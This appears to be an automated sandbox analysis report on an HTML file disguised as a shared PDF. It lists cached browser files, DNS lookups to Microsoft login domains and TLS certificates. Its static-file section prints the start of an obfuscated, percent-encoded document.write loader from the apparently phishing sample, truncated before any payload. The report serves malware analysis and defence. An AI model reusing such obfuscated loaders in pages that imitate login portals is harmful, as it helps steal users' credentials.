Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: MS Windows icon resource - 6 icons, 128x128, 16 colors, 72x72, 16 colors
Size (bytes): 17174
Entropy (8bit): 2.9129715116732746
Encrypted: false
MD5: 12E3DAC858061D088023B2BD48E2FA96
SHA1: E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256: 90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512: C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious: false
Preview: ..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\favicon[2].ico
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: MS Windows icon resource - 6 icons, 128x128, 16 colors, 72x72, 16 colors
Size (bytes): 17174
Entropy (8bit): 2.9129715116732746
Encrypted: false
MD5: 12E3DAC858061D088023B2BD48E2FA96
SHA1: E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256: 90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512: C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious: false
Preview: ..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\favicon_a_eupayfgghqiai7k9sol6lg2[1].ico
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: MS Windows icon resource - 6 icons, 128x128, 16 colors, 72x72, 16 colors
Size (bytes): 17174
Entropy (8bit): 2.9129715116732746
Encrypted: false
MD5: 12E3DAC858061D088023B2BD48E2FA96
SHA1: E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256: 90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512: C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious: false
Preview: ..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\httpErrorPagesScripts[1]
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes): 12105
Entropy (8bit): 5.451485481468043
Encrypted: false
MD5: 9234071287E637F85D721463C488704C
SHA1: CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
SHA-256: 65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
SHA-512: 87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
Malicious: false
Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\jquery-1.7.2.min[1].js
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: HTML document, UTF-8 Unicode text, with very long lines
Size (bytes): 98400
Entropy (8bit): 5.372216343161422
Encrypted: false
MD5: C209DB8CCA8078D9F5EA3FFFC8DCBB5B
SHA1: 8F147E9F86789327CE0FC5DBB3DA27EE2E81651D
SHA-256: FDBBCC3C415BAA641E0A84E29A8E18FF9A0923458FFFED63D1AD143DCDF1AFE9
SHA-512: 34A265D2F1FC153C5A718E3871EC9F2ECCA2FEC19338DD8BFFE99D040EE975A1CDC14C9E32CB182C2E6BB9378AA379DAD9CB90BB533E663FA27B3B45C2F9DFF2
Malicious: false
Preview: /*! jQuery v1.7.2 jquery.com | jquery.org/license */.(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cu(a){if(!cj[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){ck||(ck=c.createElement("iframe"),ck.frameBorder=ck.width=ck.height=0),b.appendChild(ck);if(!cl||!ck.createElement)cl=(ck.contentWindow||ck.contentDocument).document,cl.write((f.support.boxModel?"<!doctype html>":"")+"<html><body>"),cl.close();d=cl.createElement(a),cl.body.appendChild(d),e=f.css(d,"display"),b.removeChild(ck)}cj[a]=e}return cj[a]}function ct(a,b){var c={};f.each(cp.concat.apply([],cp.slice(0,b)),function(){c[this]=a});return c}function cs(){cq=b}function cr(){setTimeout(cs,0);return cq=f.now()}function ci(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}function ch(){try{return new a.XMLHttpRequest}catch(b){}}function cb(a,c){a.dataFilter&&(c=a.dataFilter(c,a.dataType));var d=a.dataTyp
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd[1].svg
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: SVG Scalable Vector Graphics image
Size (bytes): 3651
Entropy (8bit): 4.094801914706141
Encrypted: false
MD5: EE5C8D9FB6248C938FD0DC19370E90BD
SHA1: D01A22720918B781338B5BBF9202B241A5F99EE4
SHA-256: 04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
SHA-512: C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
Malicious: false
Preview: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\mscc-0.4.1.min[1].css
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: UTF-8 Unicode text, with very long lines, with no line terminators
Size (bytes): 108912
Entropy (8bit): 5.29531094760475
Encrypted: false
MD5: 35B50546931869824B2001C18D22B6BC
SHA1: BAB73DE68AA3EB6450B896FB502F5F288B872F83
SHA-256: 4B4BBAFA87644E35C133E83F8916808C7FB4B1FAEB13DC9F16862FC41200A583
SHA-512: 8FE0085E6C052FB74DD12889BF69250765F1AEF1089B91796541C854FFB8AE778987E75BD2BC570B2408F58317A94ADB1A475B9C4BC080CF3DFE6D1C458C6198
Malicious: false
Preview: @charset "utf-8";/*! mscc v0.4.1 - Copyright 2018 Microsoft Corporation */.cc-banner{position:relative;font-size:12px}.cc-banner .hide{display:none}.cc-banner a,.cc-banner div,.cc-banner span,.cc-banner svg{margin:0;padding:0;text-decoration:none}.cc-banner .cc-v-center{display:inline;vertical-align:middle;line-height:2em}.cc-banner[dir=rtl] .cc-float-left,.cc-float-right{float:right}.cc-banner[dir=rtl] .cc-float-right,.cc-float-left{float:left}.cc-banner{font-family:"Segoe UI","Helvetica Neue",Helvetica,Arial,sans-serif;color:#231f20;background:#f2f2f2;display:none;text-align:center;padding:0 1em;margin:0}@media (min-width:768px){.cc-banner{font-size:13px;padding:0 1.65em}}.cc-banner>.cc-container{text-align:left;padding:.75em 0;display:inline-block;width:100%}[dir=rtl].cc-banner>.cc-container{text-align:right}@media (min-width:1084px){.cc-banner{padding:0}.cc-banner>.cc-container{width:90%;max-width:1600px}}.cc-banner.active{display:block}.cc-banner .cc-icon{height:1.846em;width:1.84
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\mscc-0.4.1.min[1].js
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: ASCII text, with very long lines, with no line terminators
Size (bytes): 3560
Entropy (8bit): 5.226312832132134
Encrypted: false
MD5: 5E9A1F4AA31D4AA60F6F899A2E45CEF8
SHA1: 460F6C21B08FA2723DBBC68613ABDF18213B2FAA
SHA-256: C87516D7DD7077EDD467F5B7B085B035CD4803ECF049670AB19DE004E270ABA8
SHA-512: 9AB7DAF8C92879019AFEBA5A8F04A593DE048233380C1A3FA071DCA0F51F9A9ACC12969C852CD8BF675744F25B4FA0A5D1EA82BB22FE6C3887FEBC797E943E86
Malicious: false
Preview: var mscc;!function(e){function t(e){for(var t=[],n=1;n<arguments.length;n++)t[n-1]=arguments[n];x[e]&&x[e].forEach(function(e){e.apply(null,t)})}function n(e,t){x[e]?x[e].push(t):x[e]=[t]}function o(e){if(e)for(var t=0,n=document.cookie.split("; ");t<n.length;t++){var o=n[t],a=o.indexOf("="),i=o.substring(0,a);if(i===e)return o.substring(i.length+1)}return null}function a(e,t,n){var a=new Date;a.setDate(a.getDate()+n);var i=I.split("."),c=i.pop();if("localhost"==c)document.cookie=0===n?e+"="+t+";path=/":e+"="+t+";expires="+a.toUTCString()+";path=/";else for(;o(e)!==t&&0!==i.length;)c=i.pop()+"."+c,document.cookie=0===n?e+"="+t+";path=/;domain=."+c:e+"="+t+";expires="+a.toUTCString()+";path=/;domain=."+c}function i(e,t){return e.classList?e.classList.contains(t):new RegExp("(^| )"+t+"( |$)","gi").test(e.className)}function c(e,t){e.classList?e.classList.add(t):e.className+=" "+t}function s(e,t){e.classList?e.classList.remove(t):e.className=e.className.replace(new RegExp("(^|\\b)"+t.spli
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\override[1].css
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: ASCII text, with very long lines, with CRLF line terminators
Size (bytes): 1531
Entropy (8bit): 4.797455242405607
Encrypted: false
MD5: A570448F8E33150F5737B9A57B6D889A
SHA1: 860949A95B7598B394AA255FE06F530C3DA24E4E
SHA-256: 0BD288D5397A69EAD391875B422BF2CBDCC4F795D64AA2F780AFF45768D78248
SHA-512: 217F971A8012DE8FE170B4A20821A52FA198447FA582B82CF221F4D73E902C7E3AA1022CB0B209B6679C2EAE0F10469A149F510A6C2132C987F46214B1E2BBBC
Malicious: false
Preview: a.c-call-to-action:hover, button.c-call-to-action:hover{box-shadow:none!important}a.c-call-to-action:hover span, button.c-call-to-action:hover span{left:0!important}...c-call-to-action:not(.glyph-play):after { right: 0!important;} a.c-call-to-action:focus,button.c-call-to-action:focus{box-shadow:none!important}a.c-call-to-action:focus span,button.c-call-to-action:focus span{left:0!important;box-shadow:none!important}...theme-dark .c-me .msame_Header_name {color: #f2f2f2;}...pmg-page-wrapper .uhf div, .pmg-page-wrapper .uhf button, .pmg-page-wrapper .uhf a, .pmg-page-wrapper .uhf span, .pmg-page-wrapper .uhf p, .pmg-page-wrapper .uhf input {font-family: Segoe UI,SegoeUI,Helvetica Neue,Helvetica,Arial,sans-serif !important;}..@media (min-width: 540px) {.pmg-page-wrapper .uhf .c-uhfh-alert span, .pmg-page-wrapper .uhf #uhf-g-nav span, .pmg-page-wrapper .uhf .c-uhfh-actions span, .pmg-page-wrapper .uhf li, .pmg-page-wrapper .uhf button, .pmg-page-wrapper .uhf a, .pmg-page-wrapper .uhf #meC
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\servicesagreement[1].htm
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Size (bytes): 199457
Entropy (8bit): 5.106344003201765
Encrypted: false
MD5: 9F0C0F80CB1D15D6EAB320BBB12660EC
SHA1: 6112834A0C86BA145528324E92ED91CBE6B95104
SHA-256: 3CD6CC18C6B5FE59BEA20FBAD928F2643B8ECCBCE5510661A5B40F0D3C8BFA2E
SHA-512: 0078A67CB549003C520F875DD9EA0AEA91AD11DB64645169F504A43D620BA529F46674F390D3F434DFC6CC8DC77F431FD88147AE6FD9C653D2531953819CC2F2
Malicious: false
Preview: .<!DOCTYPE html ><html xmlns:mscom="http://schemas.microsoft.com/CMSvNext" xmlns:md="http://schemas.microsoft.com/mscom-data" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta name="viewport" content="initial-scale=1.0, width=device-width, user-scalable=no" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><title>Microsoft Services Agreement</title><meta name="Title" content="Microsoft Services Agreement" /><meta name="CorrelationVector" content="TTKmV8refk2wecop.1" /><meta name="Description" content="" /><meta name="MscomContentLocale" content="en-us" /><link href="https://statics-uhf-wus.akamaized.net/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/e9-4413b1/4e-bb306d/a9-963a11/10-aee09b/51-465167/1d-9730ee/34-521645/51-6d3a1e?ver=2.0" rel="stylesheet" type="text/css" media="screen" /><link href="https://statics-uhf-wus.akamaized.net/statics/override.css?c=7" rel="stylesheet" type="text/css" media="screen" /><link href="https://c.s-microsoft.co
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\style[1].css
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: ASCII text, with very long lines, with no line terminators
Size (bytes): 30000
Entropy (8bit): 5.377378427765789
Encrypted: false
MD5: 6C307038F5B5E50AA688A666B48E9F0F
SHA1: C155031E01ABC003CF473DCF5620613BF719882D
SHA-256: 3403C7B22615CE65E3454CBE95C87010DA7F456C79E2344C1C5A0A15DC30B044
SHA-512: 610D067496F1BD81A5B4902D93D0EF1242A1AAC0F2D85138E92AB63EAA94C10C26ACAC490F1257DD8D17FC090F8E263E014E05B8ACB8742A8ECEF4E77BDC4E3F
Malicious: false
Preview: .com/data/icons/New-Social-Media-Icon-Set-V11/24/facebook.png') no-repeat !important;margin-left:10px;margin-right:10px;background-size:27px 27px !important}.video-button-container .video-twitter{width:28px;height:28px;background:url('https://cdn2.iconfinder.com/data/icons/New-Social-Media-Icon-Set-V11/24/twitter.png') no-repeat !important;margin-left:10px;margin-right:10px;background-size:27px 27px !important}.video-button-container .play{background-position:0 -1544px}.video-button-container .captions{background-position:0 -732px}.video-button-container .video-light{background-position:0 -964px}.video-button-container .fullscreen{background-position:0 -1196px}.video-button-container .mute{background-position:0 -1660px}#video-controls{position:absolute;margin-bottom:10px;bottom:0;left:0;right:0;height:50px;opacity:0;-webkit-transition:opacity .3s;-moz-transition:opacity .3s;-o-transition:opacity .3s;-ms-transition:opacity .3s;transition:opacity .3s;background-image:-webkit-gradient(lin
C:\Users\user\AppData\Local\Temp\~DF2952A600E710646A.TMP
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: data
Size (bytes): 132499
Entropy (8bit): 2.67613037807218
Encrypted: false
MD5: 05A3B067D2B361F9CE36C11FEC27E78A
SHA1: 26ADF890DB8264EE548DEE2F1AB1D554AB50612F
SHA-256: 774FD9D0BA65310BE85B95DDEA8D4941170DA2AA75F94E98705DD0263A7FAC27
SHA-512: 94106FB655D3290C7CC6FE32F409CFA661A040B215142B986D6A4F172212CC1ED8A467C745D0873686B393B2FDF0729FD70673751F4EE198C35863FAD21C5A08
Malicious: false
C:\Users\user\AppData\Local\Temp\~DF627A96170C75B844.TMP
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: data
Size (bytes): 13077
Entropy (8bit): 0.5107383661010148
Encrypted: false
MD5: 39AE1993014236A99CAD2273F08A3EAD
SHA1: 383843D92894994437E2DC3C649362789ABECD40
SHA-256: C3B3D7EB81E964FE30501939991C97C3BE6D8A40A868184B9DC773CD696A7809
SHA-512: 6C6E2294C5FB35700837D5314D6BB7FAF6762B7469533688B4DA7E71CB49F0264C6D5D225A0C468D28E87A61CCD267A25730BD29C6B496A899DB377C1CC8CA9B
Malicious: false
C:\Users\user\AppData\Local\Temp\~DFE2722E89930C0447.TMP
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: data
Size (bytes): 25441
Entropy (8bit): 0.41825796848948976
Encrypted: false
MD5: 2CE578A5C18E3868F4B05FFD3AC32B45
SHA1: 87D3562F718DA2D2D9E6A663D4D5315F79C7FFB1
SHA-256: 184A717F67A8AB38A2C2F5F2177280A40F92B8FFE1F5F78F190DCD2976EE25E4
SHA-512: FB0CAFB4560422FAEED61552C3F4FDD235CCCE371C149F30B42DF834205F273F4B039D0273E74A76D1A0CEE5B944322F9B5CAF86F6091B53AC85253F922B9A1D
Malicious: false
Name IP Active Malicious Antivirus Detection Reputation
aa-hip-prod.southcentralus.cloudapp.azure.com 104.215.74.84 true false high
cs1227.wpc.alphacdn.net 192.229.221.185 true false high
statics-uhf-wus.akamaized.net unknown unknown false high
signup.live.com unknown unknown false high
secure.aadcdn.microsoftonline-p.com unknown unknown false high
code.jquery.com unknown unknown false high
login.microsoftonline.com unknown unknown false high
aadcdn.msauth.net unknown unknown false high
assets.onestore.ms unknown unknown false high
img-prod-cms-rt-microsoft-com.akamaized.net unknown unknown false high
acctcdn.msauth.net unknown unknown false high
ajax.aspnetcdn.com unknown unknown false high
Name Source Malicious Antivirus Detection Reputation
Domains and IPs
Contacted Domains
URLs from Memory and Binaries
Contacted IPs
Static File Info
General
File type: HTML document, ASCII text, with very long lines, with CRLF line terminators
Entropy (8bit): 3.117783318185634
TrID: Java Script embedded in Visual Basic Script (4500/0) 100.00%
File name: CUsersadminisratorDocumentspagesselfSENDERSharedfile07092019_pdf.html2.html
File size: 566395
MD5: 0a3a65e4479f61e0d5618894d11c2e47
SHA1: 6e51ebe4fbcc3a4941fbb0e179f710470ac0da7f
SHA256: fb470475c8c24b97f8dbe7df23a312ad84de5feea065a99b1fd317bca80e4c7b
SHA512: 9fa49e82dddb99e261e15ef078e903a5db4c0d8d51f06dcd7ba59b594d365641e0cd957d8555ba6ff5fdc783616c5bc4837da0cc964685d6ce6015a33e26bd4b
SSDEEP: 768:5aAZeagr0A1SAvLEvS2S37WRQAElji3yX2AksAYmAVA3FSA3jfAkD+AkU/AkNEAu:m3jJwfZ0
File Content Preview: <script type="text/javascript">.. ..document.write(unescape('%3c%73%63%72%69%70%74%20%6c%61%6e%67%75%61%67%65%3d%6a%61%76%61%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%27%25%33%43%25%32%31%44%4f%43%54%5
File Icon
Icon Hash: f8c89c9a9a998cb8
IP Country Flag ASN ASN Name Malicious
192.229.221.185 United States 15133 unknown false
104.215.74.84 United States 8075 unknown false
Public
Network Behavior
Timestamp Source Port Dest Port Source IP Dest IP
TCP Packets
Timestamp Source Port Dest Port Source IP Dest IP
UDP Packets
DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 9, 2019 03:22:18.036662102 CEST | 192.168.2.5 | 8.8.8.8 | 0x647f | Standard query (0) | secure.aadcdn.microsoftonline-p.com | A (IP address) | IN (0x0001)
Jul 9, 2019 03:22:18.101578951 CEST | 192.168.2.5 | 8.8.8.8 | 0xc682 | Standard query (0) | code.jquery.com | A (IP address) | IN (0x0001)
Jul 9, 2019 03:22:33.459271908 CEST | 192.168.2.5 | 8.8.8.8 | 0xf793 | Standard query (0) | secure.aadcdn.microsoftonline-p.com | A (IP address) | IN (0x0001)
Jul 9, 2019 03:22:34.615241051 CEST | 192.168.2.5 | 8.8.8.8 | 0x96be | Standard query (0) | login.microsoftonline.com | A (IP address) | IN (0x0001)
Jul 9, 2019 03:22:34.807482958 CEST | 192.168.2.5 | 8.8.8.8 | 0x4f22 | Standard query (0) | aadcdn.msauth.net | A (IP address) | IN (0x0001)
Jul 9, 2019 03:22:36.586719036 CEST | 192.168.2.5 | 8.8.8.8 | 0x19d5 | Standard query (0) | signup.live.com | A (IP address) | IN (0x0001)
Jul 9, 2019 03:22:37.413742065 CEST | 192.168.2.5 | 8.8.8.8 | 0x9b8 | Standard query (0) | acctcdn.msauth.net | A (IP address) | IN (0x0001)
Jul 9, 2019 03:22:40.320421934 CEST | 192.168.2.5 | 8.8.8.8 | 0x6892 | Standard query (0) | statics-uhf-wus.akamaized.net | A (IP address) | IN (0x0001)
Jul 9, 2019 03:22:40.335621119 CEST | 192.168.2.5 | 8.8.8.8 | 0x4067 | Standard query (0) | ajax.aspnetcdn.com | A (IP address) | IN (0x0001)
Jul 9, 2019 03:22:40.351214886 CEST | 192.168.2.5 | 8.8.8.8 | 0x2817 | Standard query (0) | img-prod-cms-rt-microsoft-com.akamaized.net | A (IP address) | IN (0x0001)
Jul 9, 2019 03:22:44.350034952 CEST | 192.168.2.5 | 8.8.8.8 | 0x7a7f | Standard query (0) | assets.onestore.ms | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 9, 2019 03:22:18.072875023 CEST | 8.8.8.8 | 192.168.2.5 | 0x647f | No error (0) | secure.aadcdn.microsoftonline-p.com | secure.aadcdn.microsoftonline-p.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001)
Jul 9, 2019 03:22:18.120796919 CEST | 8.8.8.8 | 192.168.2.5 | 0xc682 | No error (0) | code.jquery.com | cds.s5x3j6q5.hwcdn.net | | CNAME (Canonical name) | IN (0x0001)
Jul 9, 2019 03:22:33.498903036 CEST | 8.8.8.8 | 192.168.2.5 | 0xf793 | No error (0) | secure.aadcdn.microsoftonline-p.com | secure.aadcdn.microsoftonline-p.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001)
Jul 9, 2019 03:22:34.648251057 CEST | 8.8.8.8 | 192.168.2.5 | 0x96be | No error (0) | login.microsoftonline.com | prda.aadg.msidentity.com | | CNAME (Canonical name) | IN (0x0001)
Jul 9, 2019 03:22:34.648251057 CEST | 8.8.8.8 | 192.168.2.5 | 0x96be | No error (0) | prda.aadg.msidentity.com | www.prdtm.aadg.akadns.net | | CNAME (Canonical name) | IN (0x0001)
Jul 9, 2019 03:22:34.837987900 CEST | 8.8.8.8 | 192.168.2.5 | 0x4f22 | No error (0) | aadcdn.msauth.net | aadcdnoriginwus2.azureedge.net | | CNAME (Canonical name) | IN (0x0001)
Jul 9, 2019 03:22:36.197906971 CEST | 8.8.8.8 | 192.168.2.5 | 0xed42 | No error (0) | login.msa.msidentity.com | lgin.msa.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001)
Jul 9, 2019 03:22:36.628884077 CEST | 8.8.8.8 | 192.168.2.5 | 0x19d5 | No error (0) | signup.live.com | account.msa.msidentity.com | | CNAME (Canonical name) | IN (0x0001)
Jul 9, 2019 03:22:36.628884077 CEST | 8.8.8.8 | 192.168.2.5 | 0x19d5 | No error (0) | account.msa.msidentity.com | account.msa.akadns6.net | | CNAME (Canonical name) | IN (0x0001)
Jul 9, 2019 03:22:36.628884077 CEST | 8.8.8.8 | 192.168.2.5 | 0x19d5 | No error (0) | prda.aadg.msidentity.com | www.prdtm.aadg.windows.net.nsatc.net | | CNAME (Canonical name) | IN (0x0001)
Jul 9, 2019 03:22:37.475236893 CEST | 8.8.8.8 | 192.168.2.5 | 0x9b8 | No error (0) | acctcdn.msauth.net | acctcdn.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001)
Jul 9, 2019 03:22:37.475236893 CEST | 8.8.8.8 | 192.168.2.5 | 0x9b8 | No error (0) | cs1227.wpc.alphacdn.net | | 192.229.221.185 | A (IP address) | IN (0x0001)
Jul 9, 2019 03:22:39.078263044 CEST | 8.8.8.8 | 192.168.2.5 | 0x64b1 | No error (0) | aa-hip-prod.southcentralus.cloudapp.azure.com | | 104.215.74.84 | A (IP address) | IN (0x0001)
Jul 9, 2019 03:22:40.362567902 CEST | 8.8.8.8 | 192.168.2.5 | 0x6892 | No error (0) | statics-uhf-wus.akamaized.net | a849.dscg2.akamai.net | | CNAME (Canonical name) | IN (0x0001)
Jul 9, 2019 03:22:40.366381884 CEST | 8.8.8.8 | 192.168.2.5 | 0x4067 | No error (0) | ajax.aspnetcdn.com | mscomajax.vo.msecnd.net | | CNAME (Canonical name) | IN (0x0001)
Jul 9, 2019 03:22:40.390448093 CEST | 8.8.8.8 | 192.168.2.5 | 0x2817 | No error (0) | img-prod-cms-rt-microsoft-com.akamaized.net | a1449.dscg2.akamai.net | | CNAME (Canonical name) | IN (0x0001)
Jul 9, 2019 03:22:44.407598972 CEST | 8.8.8.8 | 192.168.2.5 | 0x7a7f | No error (0) | assets.onestore.ms | assets.onestore.ms.akadns.net | | CNAME (Canonical name) | IN (0x0001)
HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Jul 9, 2019 03:22:37.642251968 CEST | 192.229.221.185 | 443 | 192.168.2.5 | 49725 | CN=prod-identitycdnsan.msauth.net | CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US | Mon Dec 17 23:12:34 CET 2018 | Thu Dec 17 23:12:34 CET 2020 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c
 | | | | | CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Fri May 20 14:53:03 CEST 2016 | Mon May 20 14:53:03 CEST 2024 | |
